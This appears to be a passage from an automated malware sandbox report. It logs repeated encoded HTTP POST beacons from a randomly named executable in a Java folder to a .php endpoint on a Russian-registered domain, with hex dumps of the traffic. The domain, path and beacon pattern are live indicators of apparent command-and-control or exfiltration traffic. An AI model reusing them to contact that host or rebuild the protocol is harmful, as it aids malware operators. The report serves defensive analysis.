                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3rOxmZ1RgnFpbn97wzocvZJd8y%2FqujMzW3kV%2FNvjisobGCyl%2Bk4MGzIvxJL9rrdq2VlyppQh7Ah%2B2zFGiyPU1MqpILwZYyRmJuwP3rCTFsOn56EMEAuliIlHQlYlZaEiFG47e0bo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d603f96729e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4821&min_rtt=1934&rtt_var=6501&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=58313&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  98 | 192.168.2.4 | 50003 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:21.340914965 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:21.696871996 CET | 1072 | OUT | Data Raw: 55 50 58 57 5a 5c 54 5d 55 5a 54 59 51 58 55 5d 58 5b 5c 5f 59 5c 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UPXWZ\T]UZTYQXU]X[\_Y\RY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (Y=[!+2%*(=<'W:'4X'<-3??^,X(]+>4T=#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:21.787633896 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:21.971925020 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Whe%2Bom3JR4WUrW5OLuZjBK7hTrV4BNGqJEQ%2Fm113f4iQpV5sJnlzRZrvNP6Y96x7tqUDmzOJa3cvK8kO%2BoxUiyA2nteFYoiyRJT16Y6KILV%2FVJOJNP5LUIVISZgVx8Q4wgSvR21U"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d64e93dc335-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1888&min_rtt=1679&rtt_var=1048&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=435430&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  99 | 192.168.2.4 | 50009 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:22.154902935 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:22.509457111 CET | 1072 | OUT | Data Raw: 55 53 58 54 5a 5b 54 58 55 5a 54 59 51 58 55 50 58 59 5c 5f 59 51 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: USXTZ[TXUZTYQXUPXY\_YQR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ +,- .$.).$4*Q93<2Q$?_8>?<-'*,#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:22.598998070 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:22.864332914 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGALunCZSNArAsmS2lrDx1T7Z6PK%2BMZGgFflp6mShhLPEQ56SMH%2FXabqBRRyAou64Yqo%2B3mT8SV3ZMMIXKmXNHbPB1kuxS0mdWsw0h%2Ba4cSwSTg6HiYAX91k39EskGl6ERrSpoEb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d69fe8a8c87-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2195&min_rtt=1918&rtt_var=1274&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=352657&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.4 | 50017 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:23.262160063 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:23.618761063 CET | 1072 | OUT | Data Raw: 50 55 58 5d 5a 5b 51 5c 55 5a 54 59 51 52 55 5c 58 5f 5c 5a 59 54 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PUX]Z[Q\UZTYQRU\X_\ZYTR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ \</X71Y&>6*$2W9'(%/=3?X,4^<0U),#^!'^)
Jan 1, 2025 15:03:23.727207899 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:23.901082039 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:23 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OcmOhPebQWLL%2BbLKGUDxUCJkNmJY8FgHL8sa74Aiyxw20iYv7b4tf80S6F1OZIN%2B%2FIfOw04Ltx2liWqUPg2C6d3gU3xF0BXNN9eXCO52Qk24lnvZNfQJgYBs9dGcAmz9scdCWEoq"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d70f85843e0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3505&min_rtt=1801&rtt_var=4084&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=94577&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.4 | 50023 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:24.027158022 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:24.384682894 CET | 1072 | OUT | Data Raw: 50 55 58 56 5a 58 51 5d 55 5a 54 59 51 52 55 54 58 5f 5c 5a 59 55 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PUXVZXQ]UZTYQRUTX_\ZYURR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+Y!X71_%.\*>0$%9$'$,)'/,8> (.$W)#^!'^)
Jan 1, 2025 15:03:24.468415976 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:24.733659029 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ePLg1Q87TQvXJ%2Bk4xo5sSWqh%2BzdsasJKhV5gJ4Y7Um1dRitvqcTtDUzXkH%2BB0JPdT0laAc03YPHXLMdkDN%2FxY6WUf5isodJJJla4jSfaEE8vsNuhkWvcoKV1QJ49KPpuJspIawCD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d75ac015e73-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2573&min_rtt=1630&rtt_var=2499&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=159024&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.4 | 50029 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:24.857713938 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:25.214546919 CET | 1072 | OUT | Data Raw: 50 51 5d 57 5a 59 51 5b 55 5a 54 59 51 5a 55 5d 58 5f 5c 5c 59 5c 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQ]WZYQ[UZTYQZU]X_\\Y\R_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ](!\!89X&= 3:Q-$''?)&,/^8,_?U*#^!'^)#
Jan 1, 2025 15:03:25.310672998 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:25.582638979 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yBeukZsGhjQ8fGFq%2F9%2BB3YPCzZAIZpTaVtxaCrHR5d5gQaw4oxV9QN%2B9WLeH9lxaq5IJKg%2BZoqeONUAV71L8X%2FIiW%2FyRPVT3HITr30LGMWfA53HjVntR%2BjPYjmr70oNYbJ0YOeMs"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d7aec2e0f9b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4381&min_rtt=1671&rtt_var=6046&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=62524&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.4 | 50036 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:25.835115910 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:26.181437969 CET | 1064 | OUT | Data Raw: 55 53 58 55 5a 58 54 5e 55 5a 54 59 51 5b 55 52 58 5c 5c 5f 59 50 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: USXUZXT^UZTYQ[URX\\_YPR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(?"!89%>&(=7$4.,',)0/X;;==7)#^!'^)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.4 | 50039 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:26.203515053 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:26.556313038 CET | 1796 | OUT | Data Raw: 50 52 58 53 5f 5a 54 5f 55 5a 54 59 51 52 55 50 58 5c 5c 5c 59 55 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PRXS_ZT_UZTYQRUPX\\\YURZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^<!4+*$=))3Y'$"V:B$_$<='/^->(_(;=#^!'^)
Jan 1, 2025 15:03:26.644721031 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:26.864029884 CET | 960 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ztT8EHYRPJDBvrnakJDCy%2FyXGRj%2FDSOVV%2FHpnDegBYGhfCwAqS0iVMVN3M5MReI%2FX%2FEyLqTAB5tR%2Fa3ZnlZFQEhBZvVHUEeMh5PDlSjwqoiuKuS5xWOlnwLBMaGpGqfiyAlUfM5p"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d833c2d7c94-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2302&min_rtt=1948&rtt_var=1439&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=305183&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 51 27 3b 20 00 3c 2e 3e 10 2d 2c 3f 50 25 11 08 5d 30 09 3b 07 32 07 22 04 2d 16 0d 03 3f 38 30 01 26 2a 21 5b 21 21 3d 04 24 36 2e 5d 04 1d 26 05 3e 14 25 04 3f 3f 2e 02 29 0c 30 5d 33 09 23 1e 31 1a 23 05 27 3e 2e 5a 35 32 02 0f 33 0d 01 0b 2b 00 38 00 26 3d 2a 50 34 2a 2e 57 0d 12 22 1c 31 2d 26 0d 3e 0f 24 54 22 12 3b 1c 24 3f 2c 0d 27 3c 24 1d 37 01 21 0a 29 01 20 12 36 0e 3d 51 33 3a 24 01 22 17 31 59 22 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"Q'; <.>-,?P%]0;2"-?80&*![!!=$6.]&>%??.)0]3#1#'>.Z523+8&=*P4*.W"1-&>$T";$?,'<$7!) 6=Q3:$"1Y"3"T /T=VO0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.4 | 50042 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:26.325256109 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:26.681387901 CET | 1072 | OUT | Data Raw: 50 56 58 5c 5a 5f 51 59 55 5a 54 59 51 53 55 50 58 59 5c 58 59 56 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVX\Z_QYUZTYQSUPXY\XYVR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#? &>))-4$7=94$<"&<'[/>_((,#^!'^)
Jan 1, 2025 15:03:26.789350033 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:26.966365099 CET | 819 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iEghwlMP97K6QUbYGqiC%2F89YJZ%2F4Qya4CRuoLzgg%2FlGTAzxq8FsGKnR%2FrMa9AdN%2FrRL6gYpx5Jgxcsed%2F%2FaEfepdW%2BwtKgj1qIOizzOiUxRscqhfTBAu825jzjwNDZa5GX%2Fdmrab"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d84295e8c81-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=20033&min_rtt=16813&rtt_var=12746&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=34288&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.4 | 50048 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:27.087575912 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:27.446907043 CET | 1072 | OUT | Data Raw: 55 51 58 53 5a 5c 54 59 55 5a 54 59 51 53 55 53 58 5a 5c 5e 59 57 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UQXSZ\TYUZTYQSUSXZ\^YWRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y)?*71.2=. '7!.'73&3?/./(>8=<#^!'^)
                                                                                                                  Jan 1, 2025 15:03:27.556474924 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:27.727710962 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bmMcJjF4pjp05t3oMDSccHgACqb8ugx7wHme995DeoRtrOX%2Ba3TP5%2FKVKkUoroxVtuu8JPL%2BEZ5lBKcsIAqh1LBqebsWvaBiwf8PHWeiBo4zlspQ%2FfxghzQTWdPncmgmFh%2B9OJ87"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
